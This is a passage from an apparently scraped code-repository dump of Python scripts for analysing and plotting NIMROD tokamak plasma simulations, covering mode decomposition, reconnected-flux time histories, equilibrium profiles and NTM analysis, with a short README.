xyFields.R[0,0]\n rMinor = np.sqrt((xyFields.R-self.R0)**2+(xyFields.Z-self.Z0)**2)\n\n #calculate length along poloidal extent of poloidal flux contour\n s=np.zeros_like(xyFields.R)\n ds=np.zeros_like(xyFields.R)\n for i in range(len(s[:,0])):\n for j in range(len(s[0,:])-1):\n ds[i,j]=math.sqrt((xyFields.R[i,j+1]-xyFields.R[i,j])**2+(xyFields.Z[i,j+1]-xyFields.Z[i,j])**2)\n s[i,j+1]=s[i,j]+ds[i,j]\n\n #calculate equilibrium poloidal field for [r,pol] locations\n self.B0P=np.sqrt(xyFields.B0R**2+xyFields.B0Z**2)\n if xyFields.J0T[0,0]>0: self.B0P=-self.B0P\n\n dqds=(-xyFields.B0T)/(2*math.pi*self.B0P*xyFields.R**2)\n q1=np.trapz(dqds,s,axis=1)\n jac=q1[:,None]*xyFields.R**3*self.B0P/(-xyFields.B0T) \n\n #calculate straight-field line theta (PEST coordinate, Jim's derivation)\n theta_str=np.zeros_like(xyFields.R)\n dtheta_str=np.zeros_like(xyFields.R)\n for i in range(len(theta_str[:,0])):\n for j in range(len(theta_str[0,:])-1):\n theta_str[i,j+1]=theta_str[i,j]+1./(q1[i]+1.0e-11)*(ds[i,j]*(-xyFields.B0T[i,j])/(self.B0P[i,j]*xyFields.R[i,j]**2))\n dtheta_str[i,j]=1./(q1[i]+1.0e-11)*(ds[i,j]*(-xyFields.B0T[i,j])/(self.B0P[i,j]*xyFields.R[i,j]**2))\n# for j in range(len(theta_str[0,:])): #ECH This shift is needed\n# theta_str[i,j]=theta_str[i,j]-theta_str[i,xyFields.pd]\n\n\n dFSAAdth=2*math.pi*jac\n FSArea=np.trapz(dFSAAdth,theta_str,axis=1)\n drhodth=2*math.pi*jac*rMinor/(FSArea[:,None]+1.0e-11)\n self.rho1=np.trapz(drhodth,theta_str,axis=1)\n# todo\n rholcfs=self.rho1[int(len(self.rho1)*.75)] # this should be ~ (1-mvac)/mx \n self.rho1=self.rho1/rholcfs\n\n for i in range(len(q1)):\n mid2=(q1[i]+2.)*(q1[i+1]+2.)\n if mid2<0:\n self.irho12=i\n mid3=(q1[i]+3.)*(q1[i+1]+3.)\n if mid3<0:\n self.irho13=i\n mid4=(q1[i]+4.)*(q1[i+1]+4.)\n if mid4<0:\n self.irho14=i\n mid5=(q1[i]+5.)*(q1[i+1]+5.)\n if mid5<0:\n self.irho15=i\n mid6=(q1[i]+6.)*(q1[i+1]+6.)\n if mid6<0:\n self.irho16=i\n mid10=(q1[i]+10.)*(q1[i+1]+10.)\n if mid10<0:\n irho110=i\n break\n\n\n mmax=self.mrange\n mmin=-self.mrange\n m=np.linspace(mmin,mmax,mmax-mmin+1)\n\n# ech not sure about dim\n #bcnm should have dim[nm,nx]\n bcnm=np.zeros([mmax-mmin+1,xyFields.R.shape[0]])\n bsnm=np.zeros([mmax-mmin+1,xyFields.R.shape[0]])\n\n\n for k in range(bcnm.shape[0]): #loop over m\n dbcnmdth=2*np.pi/(FSArea[:,None]+1e-11)*jac*(xyFields.BRr*np.cos((mmin+k)*theta_str)-xyFields.BRi*np.sin((mmin+k)*theta_str))\n dbsnmdth=2*np.pi/(FSArea[:,None]+1e-11)*jac*(-xyFields.BRr*np.sin((mmin+k)*theta_str)-xyFields.BRi*np.cos((mmin+k)*theta_str))\n bcnm[k,:]=np.trapz(dbcnmdth,theta_str,axis=1)\n bsnm[k,:]=np.trapz(dbsnmdth,theta_str,axis=1)\n\n self.bnm=np.sqrt(bcnm**2+bsnm**2)\n\n def plotBmn(self):\n\n fig,ax=plt.subplots(figsize=(8,6))\n ax.plot(self.rho1,self.bnm[9,:].real,color='m',label='m=-1',lw=3)\n ax.plot(self.rho1,self.bnm[8,:].real,color='r',label='m=-2',lw=3)\n ax.plot(self.rho1,self.bnm[7,:].real,color='b',label='m=-3',lw=3)\n# ax.plot(self.rho1,self.bnm[6,:].real,color='g',label='m=-4',lw=3)\n# ax.plot(self.rho1,self.bnm[5,:].real,color='y',label='m=-5',lw=3)\n# ax.plot(self.rho1,self.bnm[4,:].real,color='lime',label='m=-6',lw=3)\n ax.plot(self.rho1,self.bnm[11,:].real,color='cyan',label='m=1',lw=3)\n ax.axvline(x=self.rho1[self.irho12],lw=3,ls=(0,(3,2)),c='r',label=r'$q=-2$')\n ax.axvline(x=self.rho1[self.irho13],lw=3,ls=(0,(3,2)),c='b',label=r'$q=-3$')\n ax.axvline(x=self.rho1[self.irho14],lw=3,ls=(0,(3,2)),c='g',label=r'$q=-4$')\n ax.axvline(x=self.rho1[self.irho15],lw=3,ls=(0,(3,2)),c='y',label=r'$q=-5$')\n ax.axvline(x=self.rho1[self.irho16],lw=3,ls=(0,(3,2)),c='lime',label=r'$q=-5$')\n \n ax.legend(loc=1,ncol=2,fontsize=14)\n \n ax.yaxis.major.formatter._useMathText = True\n ax.ticklabel_format(axis='y', style='sci', scilimits=(-2,-2))\n ax.yaxis.offsetText.set_fontsize(20)\n ax.locator_params(axis='x',nbins=5)\n\n plt.setp(ax.get_xticklabels(), fontsize=22)\n plt.setp(ax.get_yticklabels(), fontsize=22)\n \n ax.set_xlabel(r'$<r_m>$',fontsize=24)\n ax.set_ylabel(r'$B_m$',fontsize=24)\n plt.show()" }, { "alpha_fraction": 0.5898028016090393, "alphanum_fraction": 0.6405002474784851, "avg_line_length": 32.85993576049805, "blob_id": "4ab2892a2c7ecc1f750bf2760957b563265beb9e", "content_id": "03ea9ef81956bc113ab8364b6a41977c7faea23c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10395, "license_type": "no_license", "max_line_length": 91, "num_lines": 307, "path": "/surfmn/surfmn_runner.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport os\nimport h5py\nimport surfmnstep\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport argparse\nimport pickle\nimport glob\nfrom shutil import copy2\n\n''' This is a generic runner for surfmn. It loops over a bunch of directorys\nin the current directory, searchs for a surfmn file, and a dump file. If the\ndump file exists, then record the time. If not only record step number. It\nthen calls surfmn routines to plot the data and record the reconnected flux'''\n\ndef pickle_sort(file):\n print(file[6:])\n return int(file[6:])\n\ndef get_dumptime(thisfile):\n ''' Open an hdf5 file and read the dump time\n if I can't open file return None\n '''\n time=None\n with h5py.File(thisfile, 'r') as h5file:\n try:\n time=h5file[\"dumpTime\"].attrs['vsTime']\n except:\n print(f\"No dumpTime in dumpfile {thisfile}\")\n raise\n return time\n\ndef find_files(thisdir):\n ''' This fuction finds the surfmn, dump files in the directory\n input: thisdir\n output: surfmn filename, dumpfilename, stepnumber, step time\n the outputs return None, if a file does not exists\n '''\n surfmn_file=None\n dumpfile=None\n stepnumber=None\n steptime=None\n nimrodin=None\n listobjs = os.listdir(thisdir)\n for iobj in listobjs:\n wordlist = iobj.split('.')\n if (wordlist[0].lower()=='dumpgll'):\n if (dumpfile==None):\n dumpfile=thisdir+'/'+iobj\n thisstep=int(wordlist[1])\n if (stepnumber==None):\n stepnumber=thisstep\n elif (stepnumber!=thisstep):\n print(f\"Dump step does not match surfmn step\")\n raise\n steptime=get_dumptime(dumpfile)\n else:\n print(f\"Multiple dumpfiles in directory {thisdir}\")\n raise\n elif (wordlist[0].lower()=='surfmn'):\n if (surfmn_file==None):\n surfmn_file=thisdir+'/'+iobj\n thisstep=int(wordlist[1])\n if (stepnumber==None):\n stepnumber=thisstep\n elif (stepnumber!=thisstep):\n print(f\"Surfmn step does not match dump step\")\n raise\n else:\n print(f\"Multiple surfmn files in directory {thisdir}\")\n raise\n elif (iobj=='nimrod.in'):\n nimrodin=thisdir+'/'+iobj\n\n\n return surfmn_file, dumpfile, stepnumber, steptime, nimrodin\n\ndef time_hist(steplist):\n print(len(steplist))\n time=np.zeros(len(steplist))\n psi21=np.zeros(len(steplist))\n psi31=np.zeros(len(steplist))\n psi41=np.zeros(len(steplist))\n psi32=np.zeros(len(steplist))\n psi43=np.zeros(len(steplist))\n psi54=np.zeros(len(steplist))\n psi65=np.zeros(len(steplist))\n exb21=np.zeros(len(steplist))\n exb31=np.zeros(len(steplist))\n exb32=np.zeros(len(steplist))\n exb43=np.zeros(len(steplist))\n exb54=np.zeros(len(steplist))\n mlist=[-1,-2,-3,-4]\n qlist=[-1,-2,-3,-4]\n for istep,step in enumerate(steplist):\n print(istep,step.step, step.time)\n time[istep]=step.time\n if step.surfmn_data==False:\n step.read_surfmn()\n if step.profdata==False:\n try:\n os.mkdir('tempprofile')\n except:\n print(\"tempprofile directoy exists\")\n copy2(step.dumpfile,'./tempprofile')\n copy2(step.nimrodin,'./tempprofile')\n os.chdir('tempprofile')\n step.get_profiles()\n for iobj in os.listdir('.'):\n os.remove(iobj)\n os.chdir('../')\n os.rmdir('tempprofile')\n# fig = plt.figure(figsize=(6,5))\n# ax=fig.add_subplot(111)\n# plt.plot(step.profs.rhon,step.profs.omegator)\n# plt.title(r\"fsa\",fontsize=16)\n# plt.ylabel(r'nd ',fontsize=16)\n# plt.xlabel(r'rho',fontsize=16)\n# plt.tight_layout()\n# plt.show()\n psi21[istep]=step.get_resonance(\"psi\",1,-2)\n psi31[istep]=step.get_resonance(\"psi\",1,-3)\n psi41[istep]=step.get_resonance(\"psi\",1,-4)\n psi43[istep]=step.get_resonance(\"psi\",3,-4)\n psi32[istep]=step.get_resonance(\"psi\",2,-3)\n psi54[istep]=step.get_resonance(\"psi\",4,-5)\n psi65[istep]=step.get_resonance(\"psi\",5,-6)\n this_q=step.profs.get_rho_q(q=-2)\n exb21[istep]=step.profs.get_omega_exb(n=1,rhon=this_q)/(2*np.pi)\n this_q=step.profs.get_rho_q(q=-3)\n exb31[istep]=step.profs.get_omega_exb(n=1,rhon=this_q)/(2*np.pi)\n this_q=step.profs.get_rho_q(q=-1.5)\n exb32[istep]=step.profs.get_omega_exb(n=1,rhon=this_q)/(2*np.pi)\n this_q=step.profs.get_rho_q(q=-4/3)\n exb43[istep]=step.profs.get_omega_exb(n=1,rhon=this_q)/(2*np.pi)\n this_q=step.profs.get_rho_q(q=-5/4)\n exb54[istep]=step.profs.get_omega_exb(n=1,rhon=this_q)/(2*np.pi)\n if step.step in [16000]:#[10000,18680,28000,66000,96000]:\n# if step.time>0: #avoids issues if no pertubation\n this_exb=step.profs.get_omega_exb(n=1)\n this_rho_21=step.profs.get_rho_q(q=-2)\n\n fig = plt.figure(figsize=(6,5))\n ax=fig.add_subplot(111)\n plt.plot(step.profs.rhon,this_exb/(2*np.pi))\n plt.title(r\"fsa\",fontsize=16)\n plt.ylabel(r'f_exb ',fontsize=16)\n plt.xlabel(r'rho',fontsize=16)\n ax.axvline(this_rho_21,ls=':')\n plt.tight_layout()\n plt.show()\n step.plot_surfmn(\"psi\",1,**{\"scale\":1000})\n step.plot_surfmn(\"psi\",2,**{\"scale\":1000})\n step.plot_surfmn(\"psi\",3,**{\"scale\":1000})\n step.plot_surfmn(\"psi\",4,**{\"scale\":1000})\n step.plot_surfmn(\"psi\",5,**{\"scale\":1000})\n step.plot_radial(\"psi\",1,mlist,**{\"scale\":1,\"qlist\":qlist})\n\n fig = plt.figure(figsize=(6,5))\n ax=fig.add_subplot(111)\n plt.plot(time*1000,psi21*1000)\n plt.title(r\"$\\psi$ 2/1\",fontsize=16)\n plt.ylabel(r'$\\psi$ [mWb] ',fontsize=16)\n plt.xlabel(r't [ms]',fontsize=16)\n plt.show()\n fig = plt.figure(figsize=(6,5))\n ax=fig.add_subplot(111)\n plt.plot(time*1000,psi31*1000)\n plt.title(r\"$\\psi$ 3/1\",fontsize=16)\n plt.ylabel(r'$\\psi$ [mWb] ',fontsize=16)\n plt.xlabel(r't [ms]',fontsize=16)\n plt.show()\n fig = plt.figure(figsize=(6,5))\n ax=fig.add_subplot(111)\n plt.plot(time*1000,psi41*1000)\n plt.title(r\"$\\psi$ 4/1\",fontsize=16)\n plt.ylabel(r'$\\psi$ [mWb] ',fontsize=16)\n plt.xlabel(r't [ms]',fontsize=16)\n plt.show()\n fig = plt.figure(figsize=(6,5))\n ax=fig.add_subplot(111)\n plt.plot(time*1000,psi43*1000)\n plt.title(r\"$\\psi$ 4/3\",fontsize=16)\n plt.ylabel(r'$\\psi$ [mWb] ',fontsize=16)\n plt.xlabel(r't [ms]',fontsize=16)\n plt.show()\n fig = plt.figure(figsize=(6,5))\n ax=fig.add_subplot(111)\n plt.plot(time*1000,psi32*1000)\n plt.title(r\"$\\psi$ 3/2\",fontsize=16)\n plt.ylabel(r'$\\psi$ [mWb] ',fontsize=16)\n plt.xlabel(r't [ms]',fontsize=16)\n plt.show()\n fig = plt.figure(figsize=(6,5))\n ax=fig.add_subplot(111)\n plt.plot(time*1000,psi54*1000)\n plt.title(r\"$\\psi$ 5/4\",fontsize=16)\n plt.ylabel(r'$\\psi$ [mWb] ',fontsize=16)\n plt.xlabel(r't [ms]',fontsize=16)\n plt.show()\n fig = plt.figure(figsize=(6,5))\n ax=fig.add_subplot(111)\n plt.plot(time*1000,psi65*1000)\n plt.title(r\"$\\psi$ 6/5\",fontsize=16)\n plt.ylabel(r'$\\psi$ [mWb] ',fontsize=16)\n plt.xlabel(r't [ms]',fontsize=16)\n plt.show()\n fig = plt.figure(figsize=(6,5))\n ax=fig.add_subplot(111)\n plt.plot(time*1000,psi21*1000,label=\"2/1\")\n plt.plot(time*1000,psi31*1000,label=\"3/1\")\n plt.plot(time*1000,psi32*1000,label=\"3/2\")\n plt.plot(time*1000,psi43*1000,label=\"4/3\")\n plt.plot(time*1000,psi54*1000,label=\"5/4\")\n plt.plot(time*1000,psi65*1000,label=\"6/5\")\n ax.legend(loc=0)\n plt.title(r\"$\\psi$\",fontsize=16)\n plt.ylabel(r'$\\psi$ [mWb] ',fontsize=16)\n plt.xlabel(r't [ms]',fontsize=16)\n plt.show()\n fig = plt.figure(figsize=(6,5))\n ax=fig.add_subplot(111)\n plt.plot(time*1000,np.abs(exb21)/1000)\n plt.title(r\"$f_{eb}$ 2/1\",fontsize=16)\n plt.ylabel(r'f [kHz] ',fontsize=16)\n plt.xlabel(r't [ms]',fontsize=16)\n plt.tight_layout()\n plt.show()\n fig = plt.figure(figsize=(6,5))\n ax=fig.add_subplot(111)\n plt.plot(time*1000,np.abs(exb54)/1000,label=\"5/4\")\n plt.plot(time*1000,np.abs(exb43)/1000,label=\"4/3\")\n plt.plot(time*1000,np.abs(exb32)/1000,label=\"3/2\")\n plt.plot(time*1000,np.abs(exb21)/1000,label=\"2/1\")\n plt.title(r\"Mode Rotation Frequency / n\",fontsize=16)\n plt.ylabel(r'f [kHz] ',fontsize=16)\n plt.xlabel(r't [ms]',fontsize=16)\n plt.legend(loc=\"best\")\n plt.ylim(0,3)\n plt.tight_layout()\n plt.show()\n# for istep in steplist:\n\ndef surfmn_runner(show_plot=True,pickle_data=False,read_pickle=False):\n ''' main runner for surfmn\n loops over all objects in a directory\n checks to see if the objects are a directory\n if so, then searches that directoy for a dump file and surfmn file'''\n steplist=[]\n read_new = True\n if read_pickle:\n pickle_list=glob.glob(\"pickle*\")\n pickle_list.sort(key=pickle_sort)\n if len(pickle_list)>0:\n read_new=False\n for iobj in pickle_list:\n with open(iobj,'rb') as file:\n step=surfmnstep.SurfmnStep(None, None, None, None, None)\n step.load(file)\n steplist.append(step)\n# steplist.append(pickle.load(open(iobj, \"rb\" )))\n if read_new==True:\n workdir=os.getcwd()\n listobjs = os.listdir(workdir)\n listobjs.sort()\n for iobj in listobjs:\n if os.path.isdir(iobj):\n thisdir=workdir+'/'+iobj\n surfmn_file, dump, step, time, nimrodin = find_files(thisdir)\n steplist.append(surfmnstep.SurfmnStep(surfmn_file, dump, step, time,nimrodin))\n if show_plot:\n time_hist(steplist)\n if pickle_data:\n for step in steplist:\n if step==None:\n continue\n if step.surfmn_data==False:\n step.read_surfmn()\n if step.profdata==False:\n try:\n os.mkdir('tempprofile')\n except:\n print(\"tempprofile directoy exists\")\n copy2(step.dumpfile,'./tempprofile')\n copy2(step.nimrodin,'./tempprofile')\n os.chdir('tempprofile')\n step.get_profiles()\n for iobj in os.listdir('.'):\n os.remove(iobj)\n os.chdir('../')\n os.rmdir('tempprofile')\n filename=\"pickle\"+str(step.step).zfill(5)\n with open(filename,'wb') as file:\n step.dump(file)\n# pickle.dump(step,open(filename,'wb'))\n\n# steplist[1].read_surfmn()\n# print(steplist[1].get_resonance(\"psi\",1,-2))\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Surfmn runner.')\n parser.add_argument('--plot', action='store_true',help='shows plots')\n parser.add_argument('--pickle', action='store_true',help='pickle data')\n parser.add_argument('--read', '-r', action='store_true',help='read pickled data')\n args = vars(parser.parse_args())\n surfmn_runner(show_plot=args['plot'],pickle_data=args['pickle'],read_pickle=args['read'])\n" }, { "alpha_fraction": 0.6221896409988403, "alphanum_fraction": 0.69159334897995, "avg_line_length": 27.02739715576172, "blob_id": "b15a9d4d609e69fffcd2ad13a59b59574654633d", "content_id": "f42cee4b76064ad65f32545b3f97934b14ccc6f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2046, "license_type": "no_license", "max_line_length": 68, "num_lines": 73, "path": "/plotingScripts/eqfsa.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport h5py\n\nhomeDir = os.environ['HOME']\nscratchPath= \"/SCRATCH/174446_novac_debug/eq28/\"\nscratchPath=\"/SCRATCH/166439/03300_fgnimeq_q104_reorder_temp/\"\nfileName = \"eqfsa.h5\"\n\nfullFile = homeDir + scratchPath + fileName\n\nfontSize=16\neqNames = ['q',r'$\\lambda$','beq2','nd','ti','te','pi','pe']\neqNames += [r'$\\omega$','kpol']\npsiName = [r'$\\psi$']\nfc=h5py.File(fullFile, 'r')\n\nprint(fc['prof'].shape)\ndata=np.zeros(fc['prof'].shape)\nfor ii in range(fc['prof'].shape[0]):\n for jj in range(fc['prof'].shape[1]):\n data[ii,jj] =fc['prof'][ii,jj]\n\npsi=np.zeros(fc['psi'].shape)\nfor ii in range(fc['psi'].shape[0]):\n psi[ii]=fc['psi'][ii]\n\nfig=plt.figure(figsize=(6,8))\n\n#fig.subplots_adjust(left=0.5)\n#ax.yaxis.labelpad=35\nax = fig.add_subplot(311)\nax.plot(psi,abs(data[0,:]))\nax.hlines(1.0,0,1,linestyle='dotted')\nax.axvline(0.637122,ls='-',c='k')\nplt.xlim(0.0,1.0)\nplt.ylabel(eqNames[0],fontsize=fontSize, rotation=90)\nplt.title(\"Saftey Factor\",fontsize=fontSize)\nax = fig.add_subplot(312)\nax.plot(psi,abs(data[1,:]))\nplt.xlim(0.0,1.0)\nax.axvline(0.637122,ls='-',c='k')\nplt.ylabel(eqNames[1]+r' $(m^{-1})$',fontsize=fontSize, rotation=90)\nplt.title(\"Parallel Current\",fontsize=fontSize)\nax = fig.add_subplot(313)\nax.plot(psi,abs(data[8,:]/1000))\nplt.xlim(0.0,1.0)\nax.axvline(0.637122,ls='-',c='k')\nplt.xlabel(psiName[0],fontsize=fontSize)\nplt.ylabel(eqNames[8]+r' (krad/s)',fontsize=fontSize, rotation=90)\nplt.title(\"Rotation Profile\",fontsize=fontSize)\nax.hlines(0.0,0,1,linestyle='solid')\nplt.tight_layout()\nplt.show()\n\nfig=plt.figure(figsize=(4,4))\n\n#fig.subplots_adjust(left=0.5)\n#ax.yaxis.labelpad=35\nax = fig.add_subplot(111)\nax.plot(psi,data[8,:]/1000)\nplt.xlim(0.0,1.05)\n#ax.axvline(0.637122,ls='-',c='k')\nplt.xlabel(psiName[0],fontsize=fontSize)\nplt.ylabel(eqNames[8]+r' (kiloR/s)',fontsize=fontSize, rotation=90)\nplt.title(\"Rotation Profile\",fontsize=fontSize)\nax.hlines(0.0,0,1.05,linestyle='solid')\nplt.tight_layout()\nplt.show()\nprint(eqNames)\n" }, { "alpha_fraction": 0.6031610369682312, "alphanum_fraction": 0.6191798448562622, "avg_line_length": 28.262500762939453, "blob_id": "fdc2debbcda34f74f157d9260d2291e0b1296b07", "content_id": "023dfb56293df6a407db285a7c63c9a70b78d468", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4682, "license_type": "no_license", "max_line_length": 114, "num_lines": 160, "path": "/ntmscripts/ntm_tmp.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n#\n#profiles is a class for calculating 1D profiles\n# using the flux surface integration\n#\n#\nimport os\nimport h5py\n#import surfmnstep\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport argparse\nimport pickle\nimport glob\nfrom shutil import copy2\nimport ntm_step_real as step\nimport nim_timer as timer\n\n#import fsa_surfmn as surfmn\nimport matplotlib.colors as mcolors\n\n\n\n\ndef ntm_tmp(file_name=None,show_plot=True,pickle_data=False,\\\n read_pickle=False,args=[]):\n if not os.path.isfile(file_name):\n print(f\"File {file_name} not found\")\n raise IOError\n\n dump_pre=[\"dumpgll\",\"dump\"]\n dump_suf=[\"h5\"]\n pickle_pre=[\"ntm\"]\n pickle_suf=[\"pickle\"]\n nimrodin=\"nimrod.in\"\n pre=file_name.split('.')[0]\n if pre in dump_pre:\n print(f\"Performing ntm analysis from dump file\")\n # check for nimrod.in and hdf5 format\n if not os.path.isfile(nimrodin):\n print(f\"nimrod.in not found\")\n raise IOError\n if not file_name.split('.')[-1] in dump_suf:\n print(f\"dump file is not hdf5 format\")\n raise IOError\n ### todo\n nsurf=args.get(\"nsurf\",150)\n fargs={}\n eqflag=args.get(\"eqflag\",1)\n mmax=args.get(\"mmax\",10)\n nmax=args.get(\"nmax\",5)\n nmodes=args.get('nmodes',-1)\n if nmodes <1 or nmodes>nmax :\n fargs['ifour']=list(range(1,nmax+1))\n else:\n start=nmax-nmodes+1\n fargs['ifour']=list(range(start,nmax+1))\n fargs['mmax']=mmax\n # timer=nim_timer.nimTimer()\n ntm=step.ntmstep(file_name,nimrodin)\n print(\"After ntmstep\")\n ntm.get_dumptime()\n print(\"After dumptime\")\n ntm.fields.set_method(\"induction\")\n method='rad'\n if method=='rad':\n ntm.analyze_radial()\n else:\n ntm.analyze()\n\n\n # ntm.calculate_psi(rzo=np.array(args['rzo']),nsurf=nsurf,fargs=fargs)\n # raise\n #\n\n# ntm.calculate_induction(rzo=np.array(args['rzo']),nsurf=nsurf,fargs=fargs)\n# timer.timer.print_times()\n# ntm.plot_fsa_phase(key=None)\n #raise\n #ntm.analyze()\n\n #raise ValueError\n #ntm.get_domain()\n #ntm.eval_plot()\n # initalize surfmn object\n # surf=surfmn.fsasurfmn(file_name,nimrodin)\n # surf.get_dumptime()\n # rzo=np.array(args.get(\"rzo\",[1.768,-0.018831,0.0]))\n # nsurf=args.get(\"nsurf\",150)\n # fargs={}\n # eqflag=args.get(\"eqflag\",1)\n # mmax=args.get(\"mmax\",10)\n # nmax=args.get(\"nmax\",5)\n # nmodes=args.get('nmodes',-1)\n # if nmodes <1 or nmodes>nmax :\n # fargs['ifour']=list(range(1,nmax+1))\n # else:\n # start=nmax-nmodes+1\n # fargs['ifour']=list(range(start,nmax+1))\n # fargs['mmax']=mmax\n # surf.calculate(rzo=rzo,nsurf=nsurf,eqflag=eqflag,fargs=fargs)\n\n #pickle data here\n if args['pickle']:\n pfile=pickle_pre[0]+'.'+str(ntm.step).zfill(5)+'.'+pickle_suf[0]\n print(f\"writing file {pfile}\")\n with open(pfile,'wb') as file:\n ntm.dump(file)\n elif pre in pickle_pre:\n print(\"pickle_pre\")\n ntm=step.ntmstep(None,None)\n ntm.load(file_name)\n print(f\"Time: {ntm.time}\" )\n #ntm.plot_fsa_phase(key=None)\n # with open(file_name,'rb') as file:\n # surf=surfmn.fsasurfmn(None,None)\n # surf.load(file)\n else:\n print(f\"File {file_name} is not a recognized file type\")\n raise IOError\n\n #plot data here\n if args['plot']:\n ntm.plot_fsa_phase(key=None,time=ntm.time)\n # surf.plot()\n pass\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='NTM runner.')\n parser.add_argument('file',help='file name')\n parser.add_argument('--plot', action='store_true',help='shows plots')\n parser.add_argument('--pickle', action='store_true',help='pickle data')\n parser.add_argument('--read', '-r', action='store_true',help='read pickled data')\n parser.add_argument('--mmax',type=int,default=15,help=\"max poloidal mode number\")\n parser.add_argument('--nmax',type=int,default=5, help=\"max toroidal mode number\")\n parser.add_argument('--nmodes', type=int, default=-1, \\\n help=\"number of toroidal modes, defualt goes from 1 to nmax\")\n parser.add_argument('--rzo',type=float, nargs=3, default=[1.768,-0.018831,0.0], help=\"intial guess for o-point\")\n parser.add_argument('--nsurf', type=int, default=150, help=\"number of surfaces\")\n parser.add_argument('--eqflag', type=int, default=1, help=\"flag to add n=0 perturbation to eq\")\n args = vars(parser.parse_args())\n print(args)\n ntm_tmp(file_name=args['file'],show_plot=args['plot'],\\\n pickle_data=args['pickle'],read_pickle=args['read'],args=args)\n" }, { "alpha_fraction": 0.4990439713001251, "alphanum_fraction": 0.5583174228668213, "avg_line_length": 16.931034088134766, "blob_id": "6a1f103e1741ef8e81ca5943732793690742b5b5", "content_id": "6ac78aaa0738984c243c66729aa1fd223a4ac463", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 523, "license_type": "no_license", "max_line_length": 66, "num_lines": 29, "path": "/diiidNim/startPositions.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "import numpy as np\n\n\n\nr_m = 1.750\nz_m = 2.537e-2\n\na=0.567\nkappa=1.829\n\n\nppc = 25\ncords = 4\n\nnpts = ppc * cords\n\n\nphi = 0.0\nf1=open(\"start_positions.dat\",'w',)\nprint npts\nf1.write(str(npts)+'\\n')\nfor it in np.linspace(0,2*np.pi,cords,endpoint=False):\n for ir in np.linspace(1.0,0,ppc,endpoint=False):\n thisZ = z_m + ir * kappa * a * np.sin(it)\n thisR = r_m + ir * a * np.cos(it)\n print thisR,'\\b,', thisZ, '\\b,', phi\n f1.write( str(thisR)+', '+ str(thisZ)+ ', '+ str(phi)+'\\n')\n \nf1.close() " }, { "alpha_fraction": 0.7546699643135071, "alphanum_fraction": 0.7571606636047363, "avg_line_length": 56.42856979370117, "blob_id": "42a87170f2c2c360f2d9d15ad7b3055b426704a8", "content_id": "dc0293ab5f5bcc2b7761aafaece814c93bb5f05e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 803, "license_type": "no_license", "max_line_length": 103, "num_lines": 14, "path": "/README.md", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "## NIMSCRIPTS\nA collection of scripts that are part of my NIMROD workflow. \n\n### NIMROD \nInformation on the NIMROD code can be found at the official [NIMROD website](https://nimrodteam.org/)\n\n### Scripts\n - **combineDump** Combines the Fourier components in multiple dump files. \n - **trip2Nim:** Convert trip3D external magnetic field data to NIMROD readable format.\n - **surfmnNim:** Generates surface mn plots from nimrod output files. Originally developed by Matt Beidler. \n - **diiidNim:** A collection of scripts that are useful for simulations of DIII-D experiments.\n - **plotingScripts:** A collection of scripts for plotting nimrod output in matplotlib.\n - **bilderScripts:** Scripts that I use when running builder on my mac\n - **nimflSeed:** Generate a random collection of points for seeding NIMFL" }, { "alpha_fraction": 0.5354412198066711, "alphanum_fraction": 0.5875301957130432, "avg_line_length": 39.46506881713867, "blob_id": "fd19b6981f05dcb3f050c90db4343ad5b632f854", "content_id": "92c4864a77a1506d995d1c0cde90e122ca767bec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 20273, "license_type": "no_license", "max_line_length": 139, "num_lines": 501, "path": "/random/muPlots.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nfrom plot_nimrod import PlotNimrod as pn\nimport f90nml\nfrom eval_nimrod import *\nfrom field_class import *\nfrom fsa import *\n#from particle import *\nimport matplotlib.pyplot as pl\nfrom scipy.interpolate import interp1d,splev,UnivariateSpline\nimport os\n#import pfileReader\n\ndef readRaw(rawFile):\n datadict={}\n with open(rawFile, 'r') as f:\n while True:\n dataname = f.readline()\n if not dataname:\n break\n dataname = dataname.split()\n datalen = int(dataname[0])\n dataname = dataname[2]\n npdata=numpy.zeros((3,datalen),numpy.float)\n for line in range(datalen):\n datastr=f.readline().split()\n npdata[0][line]=float(datastr[0])\n npdata[1][line]=float(datastr[1])\n npdata[2][line]=float(datastr[2])\n datadict[dataname]=npdata\n return datadict\n\n# load dump file\ndumpfile = 'dumpgll.00000.h5'\nnml = f90nml.read('nimrod.in')\ngmt = nml['grid_input']['geom']\nif gmt == 'tor':\n gmt=True\nelse:\n gmt=False\neval_nimrod = EvalNimrod(dumpfile, fieldlist='nvptbj') #, (e not in dumpfile coord='xyz')\nprint(\"After eval nimrod\")\n\n#%# read sol.grn and prepare plots\n#%Rsol = numpy.loadtxt('sol.grn', skiprows=1, max_rows=1)\n#%Zsol = numpy.loadtxt('sol.grn', skiprows=3, max_rows=1)\n#%Rsep = numpy.loadtxt('sol.grn', skiprows=5, max_rows=1)\n#%Zsep = numpy.loadtxt('sol.grn', skiprows=7, max_rows=1)\n#%Rwall = numpy.loadtxt('sol.grn', skiprows=9, max_rows=1)\n#%Zwall = numpy.loadtxt('sol.grn', skiprows=11, max_rows=1)\n#%Rwall = numpy.append(Rwall,Rwall[0])\n#%Zwall = numpy.append(Zwall,Zwall[0])\nrzo = find_pf_null(eval_nimrod, [1.7, -0.2, 0])\n#%def setBdryPlot():\n#% fig, ax = 